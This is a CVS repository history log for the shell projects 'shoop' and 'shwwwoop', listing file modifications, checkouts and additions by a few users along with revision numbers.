M3aa7d734|doogie|<remote>|shoop/t|1.20|inheritance.sh
M3aa7d734|doogie|<remote>|shoop/t|1.3|metachars.sh
M3aa7d734|doogie|<remote>|shoop/t|1.3|onexit.sh
M3aa7d734|doogie|<remote>|shoop/t|1.3|serialize.sh
M3aa7d734|doogie|<remote>|shoop/t|1.3|shoop_command.sh
M3aa7d734|doogie|<remote>|shoop/t|1.2|super.sh
C3abf87bd|doogie|<remote>|shoop|1.67|Makefile
C3abf87ca|doogie|<remote>|shoop|1.113|shoop.sh
C3abf87cb|doogie|<remote>*5|shoop/modules|1.10|Makefile
M3aec4e8b|doogie|<remote>|CVSROOT|1.29|debugcvs
M3aec4ea7|doogie|<remote>|CVSROOT|1.30|debugcvs
O3aec4f28|algernon|<remote>/*0|shwwwoop||shwwwoop
O3aec4f5b|algernon|<remote>/*0|shwwwoop||shwwwoop
M3aec583c|doogie|<remote>|CVSROOT|1.31|debugcvs
M3aec5860|doogie|<remote>|CVSROOT|1.32|debugcvs
M3aec586b|doogie|<remote>|CVSROOT|1.33|debugcvs
A3aec5b9d|algernon|<remote>|shwwwoop/utils|1.1|mkChangeLog
A3aec5bfb|algernon|<remote>|shwwwoop|1.1|AUTHORS
A3aec5bfb|algernon|<remote>|shwwwoop|1.1|COPYING
A3aec5bfb|algernon|<remote>|shwwwoop|1.1|Makefile
A3aec5bfb|algernon|<remote>|shwwwoop|1.1|Makefile.top
A3aec5bfb|algernon|<remote>|shwwwoop|1.1|NEWS
A3aec5bfb|algernon|<remote>|shwwwoop|1.1|README
A3aec5bfb|algernon|<remote>|shwwwoop|1.1|Rules.mk.in
A3aec5bfb|algernon|<remote>|shwwwoop|1.1|THANKS
A3aec5bfb|algernon|<remote>|shwwwoop|1.1|TODO
A3aec5bfb|algernon|<remote>|shwwwoop|1.1|configure
A3aec5bfb|algernon|<remote>|shwwwoop/src|1.1|Makefile
A3aec5bfb|algernon|<remote>|shwwwoop/src|1.1|shwwwoop.sh.in
A3aec5bfb|algernon|<remote>|shwwwoop/src|1.1|test.sh
A3aec5bfb|algernon|<remote>|shwwwoop/src/kernel|1.1|Makefile
A3aec5bfb|algernon|<remote>|shwwwoop/src/kernel|1.1|base_config.in
A3aec5bfb|algernon|<remote>|shwwwoop/src/kernel|1.1|environment
A3aec5bfb|algernon|<remote>|shwwwoop/src/kernel|1.1|host_config.in
A3aec5bfb|algernon|<remote>|shwwwoop/src/kernel|1.1|http_response
A3aec5bfb|algernon|<remote>|shwwwoop/src/kernel|1.1|request
A3aec5bfb|algernon|<remote>|shwwwoop/src/kernel|1.1|shwwwoop
A3aec5bfb|algernon|<remote>|shwwwoop/src/kernel|1.1|utils
A3aec5bfb|algernon|<remote>|shwwwoop/utils|1.1|COMMITTERS
A3aec5bfb|algernon|<remote>|shwwwoop/utils|1.1|Makefile
M3aec610c|algernon|<remote>|shwwwoop|1.2|configure
O3aed8c82|doogie|<remote>/tests|shoop||tests
O3aed8c91|doogie|<remote>/tests|shoop/t||tests
M3b30fe44|doogie|<remote>|shoop/t|1.12|benchmark
M3b30fe45|doogie|<remote>|shoop/modules|1.5|dns.sh
M3b30fe45|doogie|<remote>|shoop/modules|1.12|list.sh
M3b30fe45|doogie|<remote>|shoop/modules|1.14|serialize.sh
M3b310476|doogie|<remote>|shoop/debian|1.3|changelog
G3b3cde8f|doogie|<remote>/t|shoop/t|1.12|benchmark
W3b3cdeef|doogie|<remote>|CVSROOT||cvsignore
W3b3cdeef|doogie|<remote>|CVSROOT||passwd
W3b3cdeef|doogie|<remote>|CVSROOT||readers
O3b46f537|algernon|<remote>/*0|shoop||shoop
O3b46fc0c|algernon|<remote>/*0|shoop||shoop
M3b47039c|algernon|<remote>|shoop|1.7|Makefile.rules
M3b47048b|algernon|<remote>|shoop/debian|1.10|rules
M3b470592|algernon|<remote>|shoop/debian|1.5|control
M3b4705b5|algernon|<remote>|shoop/debian|1.4|changelog
G3b470683|algernon|<remote>|shoop|1.7|Makefile.rules
M3b470752|algernon|<remote>|shoop/debian|1.11|rules
O3b47097d|algernon|<remote>/*0|shoop||shoop
M3b470d56|algernon|<remote>|shoop/debian|1.3|shoop-dev.examples
O3b56d52d|algernon|<remote>/*0|shoop||shoop
M3bc76ad8|doogie|<remote>|shoop|1.3|shoop2.sh
M3bc76d48|doogie|<remote>|shoop|1.4|shoop2.sh
M3bc772c3|doogie|<remote>|shoop|1.5|shoop2.sh
M3cbf85a3|doogie|<remote>|CVSROOT|1.34|debugcvs
M3cbf85bd|doogie|<remote>|CVSROOT|1.35|debugcvs
O3cdae035|anonymous|<remote>/*0|shoop||shoop
O3cdae083|anonymous|<remote>/*0|shoop||shoop
O3cdc3312|anonymous|<remote>/*0|shoop||shoop
O3cde826c|anonymous|<remote>/*0|shoop||shoop
O3cf0d309|anonymous|<remote>/*0|CVSROOT||CVSROOT
O3cf3fe0e|anonymous|<remote>/*0|shoop||shoop
O3cf3fe7e|anonymous|<remote>/*0|shwwwoop||shwwwoop
O3d07dab5|anonymous|<remote>/shoop-cvs|shoop||shoop-cvs
O3d07dac9|anonymous|<remote>/shwwwoop-cvs|shwwwoop||shwwwoop-cvs
O3d0fab35|anonymous|<remote>/*0|shoop||shoop
O3d0fab45|anonymous|<remote>/*0|shwwwoop||shwwwoop
O3d4e8e9e|anonymous|<remote>/*0|shwwwoop||shwwwoop
O3d58f0c1|anonymous|<remote>/*0|shoop||shoop
O3d58f13b|anonymous|<remote>/*0|shwwwoop||shwwwoop
O3d969555|anonymous|<remote>/*0|shoop||shoop
O3e381005|anonymous|<remote>/*0|shoop||shoop
O3e38103a|anonymous|<remote>/*0|shoop||shoop
O3e38109b|anonymous|<remote>/*0|shoop||shoop
O3e3bf5e5|anonymous|<remote>/*0|shoop||shoop
O3e3bf6da|anonymous|<remote>/*0|shoop||shoop
O4bc3cd39|anonymous|<remote>/*0|shoop||shoop
O4c80a7af|anonymous|<remote>/.|||.
O4d2ded69|anonymous|<remote>/.|||.
O4d67ffde|anonymous|<remote>/.|||.
O4d6832d8|anonymous|<remote>/.|||.
O4db3e579|anonymous|<remote>/.|||.
O4de7433f|anonymous|<remote>/.|||.
O4f08bf0c|anonymous|<remote>/.|||.
